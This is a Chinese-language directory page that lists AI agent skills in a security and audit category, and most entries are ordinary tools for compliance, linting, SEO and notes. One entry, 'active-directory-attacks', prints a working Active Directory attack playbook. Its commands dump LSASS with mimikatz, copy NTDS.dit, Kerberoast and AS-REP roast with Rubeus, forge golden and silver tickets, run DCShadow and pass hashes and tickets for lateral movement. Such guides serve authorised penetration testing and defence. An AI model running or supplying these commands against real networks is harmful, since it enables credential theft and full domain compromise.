灵感菇

AI 技能的自然生态,你的一句话,蔓延出无限连接。

搜索结果

全部能力

找到 226 个相关结果 / 命令行工具

安全与治理 / 审核评估

isms-audit-expert

isms-audit-expert

309

Senior ISMS Audit Expert for internal and external information security management system auditing. Provides ISO 27001 audit expertise, security audit program…

Stars 27,322
designsecurityauditisms

安全与治理 / 审核评估

lint-and-validate

lint-and-validate

304

Automatic quality control, linting, and static analysis procedures. Use after every code modification to ensure syntax correctness and project standards.…

Stars 27,325
securityauditlintand

安全与治理 / 审核评估

firebase-storage

firebase-storage

302

Build with Firebase Cloud Storage - file uploads, downloads, and secure access. Use when: uploading images/files, generating download URLs, implementing file pickers, setting up storage security rules, or troubleshooting storage/unauthorized, cors errors, quota exceeded, or upload failed errors. Prevents 9 documented errors.

Stars 783
uisecurityauthrag

安全与治理 / 审核评估

Active Directory 攻击

active-directory-attacks

300

Active Directory 渗透测试技术指南 ## 信息收集 ### 域基础信息 - `nltest /domain_trusts` - 查看域信任关系 - `net view /domain` - 枚举域列表 - `nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>` - 定位域控制器 ### BloodHound 资产发现 ```powershell # SharpHound 数据收集 Invoke-BloodHound -CollectionMethod All -Domain target.com -ZipFileName loot.zip ``` ### LDAP 查询 ```powershell # 查找域管账户 ([adsisearcher]"(&(objectCategory=person)(objectClass=user)(adminCount=1))").FindAll() # 查找非约束委派的服务账户 Get-ADObject -LDAPFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(samAccountType=805306368))" ``` ## 凭据获取 ### LSASS 内存提取 ```powershell # procdump + mimikatz 离线解析 procdump.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full ``` ### SAM/NTDS.dit 提取 ```powershell # Volume Shadow Copy 方式 vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\loot\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\loot\ # ntdsutil 官方工具 ntdsutil "ac i ntds" "ifm" "create full c:\loot" q q ``` ### Kerberoasting ```powershell # 请求 SPN 服务票据 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.target.com:1433" # Rubeus 自动化 Rubeus.exe kerberoast /outfile:hashes.txt ``` ## Kerberos 攻击 ### AS-REP Roasting ```powershell # 查找 "Do not require Kerberos preauthentication" 账户 Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth # Rubeus 攻击 Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt ``` ### Golden Ticket ```powershell # 需要 krbtgt 账户的 NTLM hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt mimikatz # kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt ``` ### Silver Ticket ```powershell # 针对特定服务,需要服务账户 NTLM hash mimikatz # kerberos::golden /user:fakeuser /domain:target.com /sid:S-1-5-21-... /target:sql01.target.com /service:MSSQLSvc /rc4:servicehash /ptt ``` ### DCShadow ```powershell # 需要域管权限,注册伪造 DC mimikatz # lsadump::dcshadow /object:targetuser /attribute:Description /value:"backdoor" ``` ## 横向移动 ### Pass-the-Hash ```powershell # mimikatz sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:powershell.exe # Invoke-WMIExec Invoke-WMIExec -Target dc01.target.com -Username admin -Hash hash -Command "powershell -enc ..." ``` ### Over-Pass-the-Hash ```powershell # 获取 TGT 后使用正常 Kerberos 认证 Rubeus.exe asktgt /user:admin /rc4:hash /ptt ``` ### Pass-the-Ticket ```powershell # 导出票据后注入 mimikatz # sekurlsa::tickets /export mimikatz # kerberos::ptt [0;123456]-0-0-40810000-admin@krbtgt-target.com.kirbi ``` ### 约束委派滥用 ```powershell # 配置 S4U2Self + S4U2Proxy Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.target.com /ptt ``` ### 基于资源的约束委派 (RBCD

Stars 0
uiuxtestingsecurity

安全与治理 / 审核评估

roier-seo

roier-seo

299

Technical SEO auditor and fixer. Runs Lighthouse/PageSpeed audits on websites or local dev servers, analyzes SEO/performance/accessibility scores, and…

Stars 27,327
performanceauditroierseo

安全与治理 / 审核评估

alicloud-network-dns-cli-test

alicloud-network-dns-cli-test

292

阿里云 DNS CLI 技能的最小化冒烟测试。验证 aliyun-cli 认证和 describe-subdomain 流程。

Stars 0
uiauthalicloudnetwork

安全与治理 / 审核评估

security-scanning-security-dependencies

security-scanning-security-dependencies

292

You are a security expert specializing in dependency vulnerability analysis, SBOM generation, and supply chain security. Scan project dependencies across…

Stars 37,704
testingsecurityauditdatabase

安全与治理 / 审核评估

getnote-auth

getnote-auth

288

Manage authentication for Get笔记 CLI

Stars 74
authapigetnotemanage

安全与治理 / 审核评估

load-issues

load-issues

287

Load all open issues from GitHub and save them as markdown files

Stars 999
authsqlgithubload

安全与治理 / 审核评估

getnote-search

getnote-search

287

Semantic search across notes in Get笔记 via the getnote CLI

Stars 74
uiauthgetnotesearch

安全与治理 / 审核评估

feishu-cli-vc

feishu-cli-vc

284

飞书视频会议与妙记操作。多维搜索历史会议、获取会议纪要/AI 产物/逐字稿、 查询会议录制、下载妙记媒体文件。支持 meeting-ids / minute-tokens / calendar-event-ids 三路径入口。当用户请求"搜索会议"、"会议记录"、"会议纪要"、"逐字稿"、"妙记"、"meeting"、 "vc search"、"vc recording"、"minutes"、"下载妙记"、"妙记视频"、"会议录制"、 "从日程找会议"时使用。

Stars 974
authfeishuclimeeting

安全与治理 / 审核评估

decay

decay

282

Manage evidence freshness by identifying stale decisions and providing governance actions

Stars 999
uiperformancesecurityaudit

安全与治理 / 审核评估

qms-audit-expert

qms-audit-expert

281

Senior QMS Audit Expert for internal and external quality management system auditing. Provides ISO 13485 audit expertise, audit program management,…

Stars 27,327
designauditqmsexpert

安全与治理 / 审核评估

find-bugs

find-bugs

281

Find bugs, security vulnerabilities, and code quality issues in local branch changes. Use when asked to review changes, find bugs, security review, or audit…

Stars 37,682
securityauditfindbugs

安全与治理 / 审核评估

query

query

278

Search the FPF knowledge base and display hypothesis details with assurance information

Stars 999
auditquerysearchthe

安全与治理 / 审核评估

security-compliance-compliance-check

security-compliance-compliance-check

273

You are a compliance expert specializing in regulatory requirements for software systems including GDPR, HIPAA, SOC2, PCI-DSS, and other industry standards.…

Stars 37,704
designuisecurityaudit

安全与治理 / 审核评估

getnote-tag

getnote-tag

266

Manage note tags in Get笔记 via the getnote CLI

Stars 74
uiauthgetnotetag

安全与治理 / 审核评估

getnote-kb

getnote-kb

265

Manage knowledge bases in Get笔记 via the getnote CLI

Stars 74
uiauthgetnotemanage

安全与治理 / 审核评估

attack-tree-construction

attack-tree-construction

256

Build comprehensive attack trees to visualize threat paths. Use when mapping attack scenarios, identifying defense gaps, or communicating security risks to…

Stars 37,666
designuisecurityauth

安全与治理 / 审核评估

dependency-management-deps-audit

dependency-management-deps-audit

253

You are a dependency security expert specializing in vulnerability scanning, license compliance, and supply chain security. Analyze project dependencies for…

Stars 37,676
securityauditdependencymanagement

8 / 12